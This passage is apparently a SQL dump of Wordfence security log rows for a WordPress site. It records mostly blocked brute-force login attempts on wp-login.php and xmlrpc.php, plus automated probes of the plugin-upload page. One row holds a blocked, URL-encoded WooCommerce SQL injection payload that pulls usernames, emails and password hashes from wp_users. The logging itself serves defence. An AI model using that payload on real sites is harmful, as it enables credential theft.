Wordfence Security Network',NULL),(12535,0.000000,1631487229.986351,'\0\0\0\0\0\0\0\0\0\0��R@�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12536,0.000000,1631487873.023173,'\0\0\0\0\0\0\0\0\0\0���ǧ�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12537,0.000000,1631488052.024326,'\0\0\0\0\0\0\0\0\0\0��QX4\Z',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12538,0.000000,1631488563.620877,'\0\0\0\0\0\0\0\0\0\0��h�\r�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12539,0.000000,1631489068.245129,'\0\0\0\0\0\0\0\0\0\0��gm',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12540,0.000000,1631489327.023324,'\0\0\0\0\0\0\0\0\0\0��g�z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12541,0.000000,1631489945.224190,'\0\0\0\0\0\0\0\0\0\0��/���',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12542,0.000000,1631490093.496428,'\0\0\0\0\0\0\0\0\0\0��ν�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12543,0.000000,1631490580.021365,'\0\0\0\0\0\0\0\0\0\0���\"��',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12544,0.000000,1631491110.552901,'\0\0\0\0\0\0\0\0\0\0��gm',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12545,0.000000,1631491239.194992,'\0\0\0\0\0\0\0\0\0\0���?�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12546,0.000000,1631491857.900303,'\0\0\0\0\0\0\0\0\0\0��%H',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12547,0.000000,1631492193.078038,'\0\0\0\0\0\0\0\0\0\0��]qo6',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12548,0.000000,1631492413.490086,'\0\0\0\0\0\0\0\0\0\0���YY�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12549,0.000000,1631493043.982157,'\0\0\0\0\0\0\0\0\0\0���n�u',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12550,0.000000,1631493774.271540,'\0\0\0\0\0\0\0\0\0\0���b�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12551,0.000000,1631494239.520432,'\0\0\0\0\0\0\0\0\0\0��C�=�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12552,0.000000,1631494427.262829,'\0\0\0\0\0\0\0\0\0\0�����z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12553,0.000000,1631495131.439491,'\0\0\0\0\0\0\0\0\0\0��oZ��',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12554,0.000000,1631495288.073379,'\0\0\0\0\0\0\0\0\0\0����p�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12555,0.000000,1631495724.334305,'\0\0\0\0\0\0\0\0\0\0��ge�Q',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12556,0.000000,1631496312.370048,'\0\0\0\0\0\0\0\0\0\0��_��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12557,0.000000,1631496351.048094,'\0\0\0\0\0\0\0\0\0\0��g�&',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12558,0.000000,1631497105.887923,'\0\0\0\0\0\0\0\0\0\0��_o��',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12559,0.000000,1631497810.652368,'\0\0\0\0\0\0\0\0\0\0���ɬL',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12560,0.000000,1631498367.085926,'\0\0\0\0\0\0\0\0\0\0���0H',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12561,0.000000,1631498379.638031,'\0\0\0\0\0\0\0\0\0\0��h�\Z',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12562,0.000000,1631499081.764055,'\0\0\0\0\0\0\0\0\0\0���h�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12563,0.000000,1631499443.700106,'\0\0\0\0\0\0\0\0\0\0��\"~��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12564,0.000000,1631499852.133177,'\0\0\0\0\0\0\0\0\0\0��g�z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12565,0.000000,1631500476.239887,'\0\0\0\0\0\0\0\0\0\0���\">T',0,200,0,1,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','loginFailValidUsername',NULL,NULL),(12566,0.000000,1631501127.925988,'\0\0\0\0\0\0\0\0\0\0��/���',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12567,0.000000,1631502547.333381,'\0\0\0\0\0\0\0\0\0\0��3��3',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12568,0.000000,1631502620.021782,'\0\0\0\0\0\0\0\0\0\0���j �',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12569,0.000000,1631503149.578794,'\0\0\0\0\0\0\0\0\0\0��N�<F',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12570,0.000000,1631503687.964698,'\0\0\0\0\0\0\0\0\0\0���EF',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12571,0.000000,1631504310.514218,'\0\0\0\0\0\0\0\0\0\0����2<',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12572,0.000000,1631504646.124656,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12573,0.000000,1631505115.980440,'\0\0\0\0\0\0\0\0\0\0��Cܸ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12574,0.000000,1631505650.139502,'\0\0\0\0\0\0\0\0\0\0���јs',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12575,0.000000,1631505659.271837,'\0\0\0\0\0\0\0\0\0\0����Iz',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12576,0.000000,1631505663.427293,'\0\0\0\0\0\0\0\0\0\0���6�E',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(12577,0.000000,1631506306.499047,'\0\0\0\0\0\0\0\0\0\0���YY�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12578,0.000000,1631506625.828830,'\0\0\0\0\0\0\0\0\0\0����U',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12579,1631506627.544921,1631506627.466100,'\0\0\0\0\0\0\0\0\0\0����U',0,503,0,0,0,'https://www.bournesociety.org.uk//wp-login.php','https://www.bournesociety.org.uk//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly93cC1sb2dpbi5waHA=\"}'),(12580,0.000000,1631506671.348490,'\0\0\0\0\0\0\0\0\0\0��#��v',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12581,0.000000,1631506931.089325,'\0\0\0\0\0\0\0\0\0\0����r',0,200,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0','loginFailInvalidUsername',NULL,NULL),(12582,0.000000,1631506949.334557,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12583,0.000000,1631507649.786738,'\0\0\0\0\0\0\0\0\0\0����6*',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12584,0.000000,1631507705.054204,'\0\0\0\0\0\0\0\0\0\0��g|^,',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12585,0.000000,1631508249.031289,'\0\0\0\0\0\0\0\0\0\0��ԁ\r�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12586,0.000000,1631508625.150481,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12587,0.000000,1631508983.546723,'\0\0\0\0\0\0\0\0\0\0��3���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12588,0.000000,1631510633.404752,'\0\0\0\0\0\0\0\0\0\0����\0',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12589,0.000000,1631511725.204296,'\0\0\0\0\0\0\0\0\0\0���cr5',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12590,0.000000,1631512882.384616,'\0\0\0\0\0\0\0\0\0\0�����(',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12591,0.000000,1631514068.672971,'\0\0\0\0\0\0\0\0\0\0��/��',0,200,0,1,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(12592,0.000000,1631515172.914696,'\0\0\0\0\0\0\0\0\0\0��:��^',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12593,0.000000,1631516208.009370,'\0\0\0\0\0\0\0\0\0\0��:��^',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12594,0.000000,1631518402.063492,'\0\0\0\0\0\0\0\0\0\0��T��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12595,0.000000,1631519465.429332,'\0\0\0\0\0\0\0\0\0\0��_��[',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12596,0.000000,1631520680.399205,'\0\0\0\0\0\0\0\0\0\0����\n',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12597,0.000000,1631521759.145505,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12598,0.000000,1631523034.988100,'\0\0\0\0\0\0\0\0\0\0��ν2�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12599,0.000000,1631524404.575386,'\0\0\0\0\0\0\0\0\0\0��- 9',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12600,0.000000,1631529972.010146,'\0\0\0\0\0\0\0\0\0\0��E�S',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12601,1631529973.400954,1631529973.306800,'\0\0\0\0\0\0\0\0\0\0��E�S',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12602,1631531459.061492,1631531458.974100,'\0\0\0\0\0\0\0\0\0\0���JL�',0,403,0,0,0,'https://www.bournesociety.org.uk/wp-json/wc/store/products/collection-data?calculate_attribute_counts%5B0%5D%5Btaxonomy%5D=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252Cuser_login%25252C0x3a%25252Cuser_email%25252C0x3a%25252Cuser_pass%252529from%252520wp_users%252520%25253B%252500',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','blocked:waf','WooCommerce < 5.5.1 SQL Injection','{\"learningMode\":0,\"failedRules\":\"380\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vd2Mvc3RvcmUvcHJvZHVjdHMvY29sbGVjdGlvbi1kYXRh\",\"path\":\"L3dwLWpzb24vd2Mvc3RvcmUvcHJvZHVjdHMvY29sbGVjdGlvbi1kYXRh\",\"category\":\"sqli\",\"ssl\":1}'),(12603,0.000000,1631532311.495302,'\0\0\0\0\0\0\0\0\0\0��g�Y�',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12604,0.000000,1631540242.865158,'\0\0\0\0\0\0\0\0\0\0��.e�\"',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12605,0.000000,1631541167.650980,'\0\0\0\0\0\0\0\0\0\0��#�,&',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12606,0.000000,1631542211.818791,'\0\0\0\0\0\0\0\0\0\0���;v�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12607,0.000000,1631543311.976921,'\0\0\0\0\0\0\0\0\0\0��3ðP',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12608,0.000000,1631544616.044593,'\0\0\0\0\0\0\0\0\0\0��h��t',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12609,0.000000,1631544920.636863,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12610,0.000000,1631547454.096810,'\0\0\0\0\0\0\0\0\0\0��Vt[',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12611,0.000000,1631549616.277907,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12612,0.000000,1631550455.291706,'\0\0\0\0\0\0\0\0\0\0��E�S',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12613,1631550456.686058,1631550456.522200,'\0\0\0\0\0\0\0\0\0\0��E�S',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12614,0.000000,1631551289.419487,'\0\0\0\0\0\0\0\0\0\0��Ǩg�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12615,1631551290.906313,1631551290.817700,'\0\0\0\0\0\0\0\0\0\0��Ǩg�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12616,0.000000,1631552375.493563,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12617,0.000000,1631552921.713225,'\0\0\0\0\0\0\0\0\0\0����\"o',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12618,0.000000,1631559051.988279,'\0\0\0\0\0\0\0\0\0\0��B�h',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12619,0.000000,1631562724.241629,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12620,0.000000,1631565439.198995,'\0\0\0\0\0\0\0\0\0\0��^�g',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12621,0.000000,1631566059.091518,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 